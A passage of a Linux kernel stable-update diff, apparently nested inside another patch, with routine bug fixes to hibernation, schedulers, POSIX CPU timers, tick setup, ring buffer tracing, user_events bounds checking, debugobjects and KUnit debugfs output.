+@@ -267,7 +267,7 @@ static ssize_t module_zstd_decompress(struct load_info *info,
+ 		zstd_dec.size = PAGE_SIZE;
+ 
+ 		ret = zstd_decompress_stream(dstream, &zstd_dec, &zstd_buf);
+-		kunmap(page);
++		kunmap_local(zstd_dec.dst);
+ 		retval = zstd_get_error_code(ret);
+ 		if (retval)
+ 			break;
+diff --git a/kernel/power/hibernate.c b/kernel/power/hibernate.c
+index 793c55a2becba..30d1274f03f62 100644
+--- a/kernel/power/hibernate.c
++++ b/kernel/power/hibernate.c
+@@ -64,6 +64,7 @@ enum {
+ static int hibernation_mode = HIBERNATION_SHUTDOWN;
+ 
+ bool freezer_test_done;
++bool snapshot_test;
+ 
+ static const struct platform_hibernation_ops *hibernation_ops;
+ 
+@@ -687,18 +688,22 @@ static int load_image_and_restore(void)
+ {
+ 	int error;
+ 	unsigned int flags;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	pm_pr_dbg("Loading hibernation image.\n");
+ 
+ 	lock_device_hotplug();
+ 	error = create_basic_memory_bitmaps();
+ 	if (error) {
+-		swsusp_close(FMODE_READ | FMODE_EXCL);
++		swsusp_close(mode);
+ 		goto Unlock;
+ 	}
+ 
+ 	error = swsusp_read(&flags);
+-	swsusp_close(FMODE_READ | FMODE_EXCL);
++	swsusp_close(mode);
+ 	if (!error)
+ 		error = hibernation_restore(flags & SF_PLATFORM_MODE);
+ 
+@@ -716,7 +721,6 @@ static int load_image_and_restore(void)
+  */
+ int hibernate(void)
+ {
+-	bool snapshot_test = false;
+ 	unsigned int sleep_flags;
+ 	int error;
+ 
+@@ -744,6 +748,9 @@ int hibernate(void)
+ 	if (error)
+ 		goto Exit;
+ 
++	/* protected by system_transition_mutex */
++	snapshot_test = false;
++
+ 	lock_device_hotplug();
+ 	/* Allocate memory management structures */
+ 	error = create_basic_memory_bitmaps();
+@@ -940,6 +947,8 @@ static int software_resume(void)
+ 	 */
+ 	mutex_lock_nested(&system_transition_mutex, SINGLE_DEPTH_NESTING);
+ 
++	snapshot_test = false;
++
+ 	if (swsusp_resume_device)
+ 		goto Check_image;
+ 
+diff --git a/kernel/power/power.h b/kernel/power/power.h
+index b4f4339432096..b83c8d5e188de 100644
+--- a/kernel/power/power.h
++++ b/kernel/power/power.h
+@@ -59,6 +59,7 @@ asmlinkage int swsusp_save(void);
+ 
+ /* kernel/power/hibernate.c */
+ extern bool freezer_test_done;
++extern bool snapshot_test;
+ 
+ extern int hibernation_snapshot(int platform_mode);
+ extern int hibernation_restore(int platform_mode);
+diff --git a/kernel/power/swap.c b/kernel/power/swap.c
+index 277434b6c0bfd..cc44c37699de6 100644
+--- a/kernel/power/swap.c
++++ b/kernel/power/swap.c
+@@ -1518,9 +1518,13 @@ int swsusp_check(void)
+ {
+ 	int error;
+ 	void *holder;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	hib_resume_bdev = blkdev_get_by_dev(swsusp_resume_device,
+-					    FMODE_READ | FMODE_EXCL, &holder);
++					    mode, &holder);
+ 	if (!IS_ERR(hib_resume_bdev)) {
+ 		set_blocksize(hib_resume_bdev, PAGE_SIZE);
+ 		clear_page(swsusp_header);
+@@ -1547,7 +1551,7 @@ int swsusp_check(void)
+ 
+ put:
+ 		if (error)
+-			blkdev_put(hib_resume_bdev, FMODE_READ | FMODE_EXCL);
++			blkdev_put(hib_resume_bdev, mode);
+ 		else
+ 			pr_debug("Image signature found, resuming\n");
+ 	} else {
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 5221291937713..20f5492e6a07b 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -659,6 +659,7 @@ void __rcu_irq_enter_check_tick(void)
+ 	}
+ 	raw_spin_unlock_rcu_node(rdp->mynode);
+ }
++NOKPROBE_SYMBOL(__rcu_irq_enter_check_tick);
+ #endif /* CONFIG_NO_HZ_FULL */
+ 
+ /*
+diff --git a/kernel/relay.c b/kernel/relay.c
+index ef12532168d9c..e16efd55571ca 100644
+--- a/kernel/relay.c
++++ b/kernel/relay.c
+@@ -989,7 +989,8 @@ static size_t relay_file_read_start_pos(struct rchan_buf *buf)
+ 	size_t subbuf_size = buf->chan->subbuf_size;
+ 	size_t n_subbufs = buf->chan->n_subbufs;
+ 	size_t consumed = buf->subbufs_consumed % n_subbufs;
+-	size_t read_pos = consumed * subbuf_size + buf->bytes_consumed;
++	size_t read_pos = (consumed * subbuf_size + buf->bytes_consumed)
++			% (n_subbufs * subbuf_size);
+ 
+ 	read_subbuf = read_pos / subbuf_size;
+ 	padding = buf->padding[read_subbuf];
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index 0d97d54276cc8..238bdb36f8848 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -2246,6 +2246,7 @@ static struct rq *find_lock_later_rq(struct task_struct *task, struct rq *rq)
+ 				     !cpumask_test_cpu(later_rq->cpu, &task->cpus_mask) ||
+ 				     task_on_cpu(rq, task) ||
+ 				     !dl_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 				double_unlock_balance(rq, later_rq);
+ 				later_rq = NULL;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 661226e38835d..6f1c7a8fa12ab 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6487,7 +6487,7 @@ static int wake_affine(struct sched_domain *sd, struct task_struct *p,
+ 		target = wake_affine_weight(sd, p, this_cpu, prev_cpu, sync);
+ 
+ 	schedstat_inc(p->stats.nr_wakeups_affine_attempts);
+-	if (target == nr_cpumask_bits)
++	if (target != this_cpu)
+ 		return prev_cpu;
+ 
+ 	schedstat_inc(sd->ttwu_move_affine);
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 0a11f44adee57..4f5796dd26a56 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -2000,11 +2000,15 @@ static struct rq *find_lock_lowest_rq(struct task_struct *task, struct rq *rq)
+ 			 * the mean time, task could have
+ 			 * migrated already or had its affinity changed.
+ 			 * Also make sure that it wasn't scheduled on its rq.
++			 * It is possible the task was scheduled, set
++			 * "migrate_disabled" and then got preempted, so we must
++			 * check the task migration disable flag here too.
+ 			 */
+ 			if (unlikely(task_rq(task) != rq ||
+ 				     !cpumask_test_cpu(lowest_rq->cpu, &task->cpus_mask) ||
+ 				     task_on_cpu(rq, task) ||
+ 				     !rt_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 
+ 				double_unlock_balance(rq, lowest_rq);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8b..44b25ff35d28a 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -847,6 +847,8 @@ static u64 collect_timerqueue(struct timerqueue_head *head,
+ 			return expires;
+ 
+ 		ctmr->firing = 1;
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(ctmr->handling, current);
+ 		cpu_timer_dequeue(ctmr);
+ 		list_add_tail(&ctmr->elist, firing);
+ 	}
+@@ -1162,7 +1164,49 @@ static void handle_posix_cpu_timers(struct task_struct *tsk);
+ #ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
+ static void posix_cpu_timers_work(struct callback_head *work)
+ {
++	struct posix_cputimers_work *cw = container_of(work, typeof(*cw), work);
++
++	mutex_lock(&cw->mutex);
+ 	handle_posix_cpu_timers(current);
++	mutex_unlock(&cw->mutex);
++}
++
++/*
++ * Invoked from the posix-timer core when a cancel operation failed because
++ * the timer is marked firing. The caller holds rcu_read_lock(), which
++ * protects the timer and the task which is expiring it from being freed.
++ */
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	struct task_struct *tsk = rcu_dereference(timr->it.cpu.handling);
++
++	/* Has the handling task completed expiry already? */
++	if (!tsk)
++		return;
++
++	/* Ensure that the task cannot go away */
++	get_task_struct(tsk);
++	/* Now drop the RCU protection so the mutex can be locked */
++	rcu_read_unlock();
++	/* Wait on the expiry mutex */
++	mutex_lock(&tsk->posix_cputimers_work.mutex);
++	/* Release it immediately again. */
++	mutex_unlock(&tsk->posix_cputimers_work.mutex);
++	/* Drop the task reference. */
++	put_task_struct(tsk);
++	/* Relock RCU so the callsite is balanced */
++	rcu_read_lock();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	/* Ensure that timr->it.cpu.handling task cannot go away */
++	rcu_read_lock();
++	spin_unlock_irq(&timr->it_lock);
++	posix_cpu_timer_wait_running(timr);
++	rcu_read_unlock();
++	/* @timr is on stack and is valid */
++	spin_lock_irq(&timr->it_lock);
+ }
+ 
+ /*
+@@ -1178,6 +1222,7 @@ void clear_posix_cputimers_work(struct task_struct *p)
+ 	       sizeof(p->posix_cputimers_work.work));
+ 	init_task_work(&p->posix_cputimers_work.work,
+ 		       posix_cpu_timers_work);
++	mutex_init(&p->posix_cputimers_work.mutex);
+ 	p->posix_cputimers_work.scheduled = false;
+ }
+ 
+@@ -1256,6 +1301,18 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk)
+ 	lockdep_posixtimer_exit();
+ }
+ 
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	cpu_relax();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	spin_unlock_irq(&timr->it_lock);
++	cpu_relax();
++	spin_lock_irq(&timr->it_lock);
++}
++
+ static inline bool posix_cpu_timers_work_scheduled(struct task_struct *tsk)
+ {
+ 	return false;
+@@ -1364,6 +1421,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
+ 		 */
+ 		if (likely(cpu_firing >= 0))
+ 			cpu_timer_fire(timer);
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(timer->it.cpu.handling, NULL);
+ 		spin_unlock(&timer->it_lock);
+ 	}
+ }
+@@ -1498,23 +1557,16 @@ static int do_cpu_nanosleep(const clockid_t which_clock, int flags,
+ 		expires = cpu_timer_getexpires(&timer.it.cpu);
+ 		error = posix_cpu_timer_set(&timer, 0, &zero_it, &it);
+ 		if (!error) {
+-			/*
+-			 * Timer is now unarmed, deletion can not fail.
+-			 */
++			/* Timer is now unarmed, deletion can not fail. */
+ 			posix_cpu_timer_del(&timer);
++		} else {
++			while (error == TIMER_RETRY) {
++				posix_cpu_timer_wait_running_nsleep(&timer);
++				error = posix_cpu_timer_del(&timer);
++			}
+ 		}
+-		spin_unlock_irq(&timer.it_lock);
+ 
+-		while (error == TIMER_RETRY) {
+-			/*
+-			 * We need to handle case when timer was or is in the
+-			 * middle of firing. In other cases we already freed
+-			 * resources.
+-			 */
+-			spin_lock_irq(&timer.it_lock);
+-			error = posix_cpu_timer_del(&timer);
+-			spin_unlock_irq(&timer.it_lock);
+-		}
++		spin_unlock_irq(&timer.it_lock);
+ 
+ 		if ((it.it_value.tv_sec | it.it_value.tv_nsec) == 0) {
+ 			/*
+@@ -1624,6 +1676,7 @@ const struct k_clock clock_posix_cpu = {
+ 	.timer_del		= posix_cpu_timer_del,
+ 	.timer_get		= posix_cpu_timer_get,
+ 	.timer_rearm		= posix_cpu_timer_rearm,
++	.timer_wait_running	= posix_cpu_timer_wait_running,
+ };
+ 
+ const struct k_clock clock_process = {
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 0c8a87a11b39d..808a247205a9a 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -846,6 +846,10 @@ static struct k_itimer *timer_wait_running(struct k_itimer *timer,
+ 	rcu_read_lock();
+ 	unlock_timer(timer, *flags);
+ 
++	/*
++	 * kc->timer_wait_running() might drop RCU lock. So @timer
++	 * cannot be touched anymore after the function returns!
++	 */
+ 	if (!WARN_ON_ONCE(!kc->timer_wait_running))
+ 		kc->timer_wait_running(timer);
+ 
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index 46789356f856e..65b8658da829e 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -218,9 +218,19 @@ static void tick_setup_device(struct tick_device *td,
+ 		 * this cpu:
+ 		 */
+ 		if (tick_do_timer_cpu == TICK_DO_TIMER_BOOT) {
++			ktime_t next_p;
++			u32 rem;
++
+ 			tick_do_timer_cpu = cpu;
+ 
+-			tick_next_period = ktime_get();
++			next_p = ktime_get();
++			div_u64_rem(next_p, TICK_NSEC, &rem);
++			if (rem) {
++				next_p -= rem;
++				next_p += TICK_NSEC;
++			}
++
++			tick_next_period = next_p;
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+ 			 * The boot CPU may be nohz_full, in which case set
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index b0e3c9205946f..a46506f7ec6d0 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -281,6 +281,11 @@ static bool check_tick_dependency(atomic_t *dep)
+ 		return true;
+ 	}
+ 
++	if (val & TICK_DEP_MASK_RCU_EXP) {
++		trace_tick_stop(0, TICK_DEP_MASK_RCU_EXP);
++		return true;
++	}
++
+ 	return false;
+ }
+ 
+@@ -527,7 +532,7 @@ void __init tick_nohz_full_setup(cpumask_var_t cpumask)
+ 	tick_nohz_full_running = true;
+ }
+ 
+-static int tick_nohz_cpu_down(unsigned int cpu)
++bool tick_nohz_cpu_hotpluggable(unsigned int cpu)
+ {
+ 	/*
+ 	 * The tick_do_timer_cpu CPU handles housekeeping duty (unbound
+@@ -535,8 +540,13 @@ static int tick_nohz_cpu_down(unsigned int cpu)
+ 	 * CPUs. It must remain online when nohz full is enabled.
+ 	 */
+ 	if (tick_nohz_full_running && tick_do_timer_cpu == cpu)
+-		return -EBUSY;
+-	return 0;
++		return false;
++	return true;
++}
++
++static int tick_nohz_cpu_down(unsigned int cpu)
++{
++	return tick_nohz_cpu_hotpluggable(cpu) ? 0 : -EBUSY;
+ }
+ 
+ void __init tick_nohz_init(void)
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index 5579ead449f25..09d594900ee0b 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -526,7 +526,7 @@ EXPORT_SYMBOL_GPL(ktime_get_raw_fast_ns);
+  * partially updated.  Since the tk->offs_boot update is a rare event, this
+  * should be a rare occurrence which postprocessing should be able to handle.
+  *
+- * The caveats vs. timestamp ordering as documented for ktime_get_fast_ns()
++ * The caveats vs. timestamp ordering as documented for ktime_get_mono_fast_ns()
+  * apply as well.
+  */
+ u64 notrace ktime_get_boot_fast_ns(void)
+@@ -576,7 +576,7 @@ static __always_inline u64 __ktime_get_real_fast(struct tk_fast *tkf, u64 *mono)
+ /**
+  * ktime_get_real_fast_ns: - NMI safe and fast access to clock realtime.
+  *
+- * See ktime_get_fast_ns() for documentation of the time stamp ordering.
++ * See ktime_get_mono_fast_ns() for documentation of the time stamp ordering.
+  */
+ u64 ktime_get_real_fast_ns(void)
+ {
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 12da17243747d..6f8b9e3b144c6 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1778,6 +1778,8 @@ static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
+ 	struct list_head *head = cpu_buffer->pages;
+ 	struct buffer_page *bpage, *tmp;
+ 
++	irq_work_sync(&cpu_buffer->irq_work.work);
++
+ 	free_buffer_page(cpu_buffer->reader_page);
+ 
+ 	if (head) {
+@@ -1884,6 +1886,8 @@ ring_buffer_free(struct trace_buffer *buffer)
+ 
+ 	cpuhp_state_remove_instance(CPUHP_TRACE_RB_PREPARE, &buffer->node);
+ 
++	irq_work_sync(&buffer->irq_work.work);
++
+ 	for_each_buffer_cpu(buffer, cpu)
+ 		rb_free_cpu_buffer(buffer->buffers[cpu]);
+ 
+@@ -5349,6 +5353,9 @@ void ring_buffer_reset_cpu(struct trace_buffer *buffer, int cpu)
+ }
+ EXPORT_SYMBOL_GPL(ring_buffer_reset_cpu);
+ 
++/* Flag to ensure proper resetting of atomic variables */
++#define RESET_BIT	(1 << 30)
++
+ /**
+  * ring_buffer_reset_online_cpus - reset a ring buffer per CPU buffer
+  * @buffer: The ring buffer to reset a per cpu buffer of
+@@ -5365,20 +5372,27 @@ void ring_buffer_reset_online_cpus(struct trace_buffer *buffer)
+ 	for_each_online_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
+-		atomic_inc(&cpu_buffer->resize_disabled);
++		atomic_add(RESET_BIT, &cpu_buffer->resize_disabled);
+ 		atomic_inc(&cpu_buffer->record_disabled);
+ 	}
+ 
+ 	/* Make sure all commits have finished */
+ 	synchronize_rcu();
+ 
+-	for_each_online_buffer_cpu(buffer, cpu) {
++	for_each_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
++		/*
++		 * If a CPU came online during the synchronize_rcu(), then
++		 * ignore it.
++		 */
++		if (!(atomic_read(&cpu_buffer->resize_disabled) & RESET_BIT))
++			continue;
++
+ 		reset_disabled_cpu_buffer(cpu_buffer);
+ 
+ 		atomic_dec(&cpu_buffer->record_disabled);
+-		atomic_dec(&cpu_buffer->resize_disabled);
++		atomic_sub(RESET_BIT, &cpu_buffer->resize_disabled);
+ 	}
+ 
+ 	mutex_unlock(&buffer->mutex);
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 13b324f008256..a61a96569ef5a 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9621,7 +9621,7 @@ init_tracer_tracefs(struct trace_array *tr, struct dentry *d_tracer)
+ 
+ 	tr->buffer_percent = 50;
+ 
+-	trace_create_file("buffer_percent", TRACE_MODE_READ, d_tracer,
++	trace_create_file("buffer_percent", TRACE_MODE_WRITE, d_tracer,
+ 			tr, &buffer_percent_fops);
+ 
+ 	create_trace_options_dir(tr);
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 908e8a13c675b..625cab4b9d945 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1398,6 +1398,9 @@ static ssize_t user_events_write_core(struct file *file, struct iov_iter *i)
+ 	if (unlikely(copy_from_iter(&idx, sizeof(idx), i) != sizeof(idx)))
+ 		return -EFAULT;
+ 
++	if (idx < 0)
++		return -EINVAL;
++
+ 	rcu_read_lock_sched();
+ 
+ 	refs = rcu_dereference_sched(info->refs);
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 76ea87b0251ce..e5421775deb38 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -4850,10 +4850,16 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	struct worker *worker;
+ 	bool first = true;
+ 	unsigned long flags;
++	unsigned long hung = 0;
+ 
+ 	raw_spin_lock_irqsave(&pool->lock, flags);
+ 	if (pool->nr_workers == pool->nr_idle)
+ 		goto next_pool;
++
++	/* How long the first pending work is waiting for a worker. */
++	if (!list_empty(&pool->worklist))
++		hung = jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000;
++
+ 	/*
+ 	 * Defer printing to avoid deadlocks in console drivers that
+ 	 * queue work while holding locks also taken in their write
+@@ -4862,9 +4868,7 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	printk_deferred_enter();
+ 	pr_info("pool %d:", pool->id);
+ 	pr_cont_pool_info(pool);
+-	pr_cont(" hung=%us workers=%d",
+-		jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000,
+-		pool->nr_workers);
++	pr_cont(" hung=%lus workers=%d", hung, pool->nr_workers);
+ 	if (pool->manager)
+ 		pr_cont(" manager: %d",
+ 			task_pid_nr(pool->manager->task));
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index df86e649d8be0..003edc5ebd673 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -216,10 +216,6 @@ static struct debug_obj *__alloc_object(struct hlist_head *list)
+ 	return obj;
+ }
+ 
+-/*
+- * Allocate a new object. If the pool is empty, switch off the debugger.
+- * Must be called with interrupts disabled.
+- */
+ static struct debug_obj *
+ alloc_object(void *addr, struct debug_bucket *b, const struct debug_obj_descr *descr)
+ {
+@@ -552,36 +548,74 @@ static void debug_object_is_on_stack(void *addr, int onstack)
+ 	WARN_ON(1);
+ }
+ 
+-static void
+-__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++static struct debug_obj *lookup_object_or_alloc(void *addr, struct debug_bucket *b,
++						const struct debug_obj_descr *descr,
++						bool onstack, bool alloc_ifstatic)
+ {
+-	enum debug_obj_state state;
+-	bool check_stack = false;
+-	struct debug_bucket *db;
+-	struct debug_obj *obj;
+-	unsigned long flags;
++	struct debug_obj *obj = lookup_object(addr, b);
++	enum debug_obj_state state = ODEBUG_STATE_NONE;
++
++	if (likely(obj))
++		return obj;
++
++	/*
++	 * debug_object_init() unconditionally allocates untracked
++	 * objects. It does not matter whether it is a static object or
++	 * not.
++	 *
++	 * debug_object_assert_init() and debug_object_activate() allow
++	 * allocation only if the descriptor callback confirms that the
++	 * object is static and considered initialized. For non-static
++	 * objects the allocation needs to be done from the fixup callback.
++	 */
++	if (unlikely(alloc_ifstatic)) {
++		if (!descr->is_static_object || !descr->is_static_object(addr))
++			return ERR_PTR(-ENOENT);
++		/* Statically allocated objects are considered initialized */
++		state = ODEBUG_STATE_INIT;
++	}
++
++	obj = alloc_object(addr, b, descr);
++	if (likely(obj)) {
++		obj->state = state;
++		debug_object_is_on_stack(addr, onstack);
++		return obj;
++	}
++
++	/* Out of memory. Do the cleanup outside of the locked region */
++	debug_objects_enabled = 0;
++	return NULL;
++}
+ 
++static void debug_objects_fill_pool(void)
++{
+ 	/*
+ 	 * On RT enabled kernels the pool refill must happen in preemptible
+ 	 * context:
+ 	 */
+ 	if (!IS_ENABLED(CONFIG_PREEMPT_RT) || preemptible())
+ 		fill_pool();
++}
++
++static void
++__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++{
++	enum debug_obj_state state;
++	struct debug_bucket *db;
++	struct debug_obj *obj;
++	unsigned long flags;
++
++	debug_objects_fill_pool();
+ 
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (!obj) {
+-		obj = alloc_object(addr, db, descr);
+-		if (!obj) {
+-			debug_objects_enabled = 0;
+-			raw_spin_unlock_irqrestore(&db->lock, flags);
+-			debug_objects_oom();
+-			return;
+-		}
+-		check_stack = true;
++	obj = lookup_object_or_alloc(addr, db, descr, onstack, false);
++	if (unlikely(!obj)) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		debug_objects_oom();
++		return;
+ 	}
+ 
+ 	switch (obj->state) {
+@@ -607,8 +641,6 @@ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (check_stack)
+-		debug_object_is_on_stack(addr, onstack);
+ }
+ 
+ /**
+@@ -648,24 +680,24 @@ EXPORT_SYMBOL_GPL(debug_object_init_on_stack);
+  */
+ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	enum debug_obj_state state;
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+ 	int ret;
+-	struct debug_obj o = { .object = addr,
+-			       .state = ODEBUG_STATE_NOTAVAILABLE,
+-			       .descr = descr };
+ 
+ 	if (!debug_objects_enabled)
+ 		return 0;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (obj) {
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	if (likely(!IS_ERR_OR_NULL(obj))) {
+ 		bool print_object = false;
+ 
+ 		switch (obj->state) {
+@@ -698,24 +730,16 @@ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+ 
+-	/*
+-	 * We are here when a static object is activated. We
+-	 * let the type specific code confirm whether this is
+-	 * true or not. if true, we just make sure that the
+-	 * static object is tracked in the object tracker. If
+-	 * not, this must be a bug, so we try to fix it up.
+-	 */
+-	if (descr->is_static_object && descr->is_static_object(addr)) {
+-		/* track this static object */
+-		debug_object_init(addr, descr);
+-		debug_object_activate(addr, descr);
+-	} else {
+-		debug_print_object(&o, "activate");
+-		ret = debug_object_fixup(descr->fixup_activate, addr,
+-					ODEBUG_STATE_NOTAVAILABLE);
+-		return ret ? 0 : -EINVAL;
++	/* If NULL the allocation has hit OOM */
++	if (!obj) {
++		debug_objects_oom();
++		return 0;
+ 	}
+-	return 0;
++
++	/* Object is neither static nor tracked. It's not initialized */
++	debug_print_object(&o, "activate");
++	ret = debug_object_fixup(descr->fixup_activate, addr, ODEBUG_STATE_NOTAVAILABLE);
++	return ret ? 0 : -EINVAL;
+ }
+ EXPORT_SYMBOL_GPL(debug_object_activate);
+ 
+@@ -869,6 +893,7 @@ EXPORT_SYMBOL_GPL(debug_object_free);
+  */
+ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+@@ -876,34 +901,25 @@ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ 	if (!debug_objects_enabled)
+ 		return;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	raw_spin_unlock_irqrestore(&db->lock, flags);
++	if (likely(!IS_ERR_OR_NULL(obj)))
++		return;
+ 
+-	obj = lookup_object(addr, db);
++	/* If NULL the allocation has hit OOM */
+ 	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		/*
+-		 * Maybe the object is static, and we let the type specific
+-		 * code confirm. Track this static object if true, else invoke
+-		 * fixup.
+-		 */
+-		if (descr->is_static_object && descr->is_static_object(addr)) {
+-			/* Track this static object */
+-			debug_object_init(addr, descr);
+-		} else {
+-			debug_print_object(&o, "assert_init");
+-			debug_object_fixup(descr->fixup_assert_init, addr,
+-					   ODEBUG_STATE_NOTAVAILABLE);
+-		}
++		debug_objects_oom();
+ 		return;
+ 	}
+ 
+-	raw_spin_unlock_irqrestore(&db->lock, flags);
++	/* Object is neither tracked nor static. It's not initialized. */
++	debug_print_object(&o, "assert_init");
++	debug_object_fixup(descr->fixup_assert_init, addr, ODEBUG_STATE_NOTAVAILABLE);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_assert_init);
+ 
+diff --git a/lib/kunit/debugfs.c b/lib/kunit/debugfs.c
+index de0ee2e03ed60..b08bb1fba106d 100644
+--- a/lib/kunit/debugfs.c
++++ b/lib/kunit/debugfs.c
+@@ -55,14 +55,24 @@ static int debugfs_print_results(struct seq_file *seq, void *v)
+ 	enum kunit_status success = kunit_suite_has_succeeded(suite);
+ 	struct kunit_case *test_case;
+ 
+-	if (!suite || !suite->log)
++	if (!suite)
+ 		return 0;
+ 
+-	seq_printf(seq, "%s", suite->log);
++	/* Print KTAP header so the debugfs log can be parsed as valid KTAP. */
++	seq_puts(seq, "KTAP version 1\n");
++	seq_puts(seq, "1..1\n");
++
++	/* Print suite header because it is not stored in the test logs. */
++	seq_puts(seq, KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "# Subtest: %s\n", suite->name);
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "1..%zd\n", kunit_suite_num_test_cases(suite));
+ 
+ 	kunit_suite_for_each_test_case(suite, test_case)
+ 		debugfs_print_result(seq, suite, test_case);
+ 
++	if (suite->log)
++		seq_printf(seq, "%s", suite->log);
++
+ 	seq_printf(seq, "%s %d %s\n",
+ 		   kunit_status_to_ok_not_ok(success), 1, suite->name);
+ 	return 0;
+diff --git a/lib/kunit/test.c b/lib/kunit/test.c
+index 890ba5b3a9819..820f867e35f40 100644
+--- a/lib/kunit/test.c
++++ b/lib/kunit/test.c
+@@ -152,10 +152,18 @@ EXPORT_SYMBOL_GPL(kunit_suite_num_test_cases);
+ 
+ static void kunit_print_suite_start(struct kunit_suite *suite)
+ {
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "KTAP version 1\n");
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "# Subtest: %s",
++	/*
++	 * We do not log the test suite header as doing so would
++	 * mean debugfs display would consist of the test suite
++	 * header prior to individual test results.
++	 * Hence directly printk the suite status, and we will
++	 * separately seq_printf() the suite header for the debugfs
++	 * representation.
++	 */
++	pr_info(KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	pr_info(KUNIT_SUBTEST_INDENT "# Subtest: %s\n",
